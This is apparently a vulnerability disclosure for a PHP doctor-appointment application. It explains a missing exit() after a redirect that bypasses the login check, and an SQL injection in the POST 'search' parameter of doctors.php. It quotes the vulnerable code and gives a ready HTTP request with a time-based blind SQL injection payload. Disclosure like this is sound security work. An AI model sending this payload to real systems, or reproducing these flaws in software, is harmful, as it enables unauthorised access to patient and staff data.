Found a vulnerability

[0clickjacking0]

Vulnerability file address

doctor/doctors.php from line 26,the problem is at line 36header("location: ../login.php");,there is no exit() termination statement after the header function in the else statement, so that the code can continue to be executed backwards, so as long as the header like Cookie: PHPSESSID=foo is not passed in http

......
......
......
session_start();

    if(isset($_SESSION["user"])){
        if(($_SESSION["user"])=="" or $_SESSION['usertype']!='d'){
            header("location: ../login.php");
        }else{
            $useremail=$_SESSION["user"];
        }

    }else{
        header("location: ../login.php");
    }
......
......
......

doctor/doctors.php from line 166,The $keyword parameter is controllable, the parameter search can be passed through post, and the $keyword is not protected from sql injection, line 211 $result= $database->query($sqlmain); causes sql injection

......
......
......
if($_POST){
  $keyword=$_POST["search"];

  $sqlmain= "select * from doctor where docemail='$keyword' or docname='$keyword' or docname like '$keyword%' or docname like '%$keyword' or docname like '%$keyword%'";
}else{
  $sqlmain= "select * from doctor order by docid desc";

}
......
......
......

  $result= $database->query($sqlmain);
......
......
......

POC

POST /doctor/doctors.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/doctor/doctors.php
Upgrade-Insecure-Requests: 1

search=1' AND (SELECT 7687 FROM (SELECT(SLEEP(5)))rWjf)-- xSIp

Attack results pictures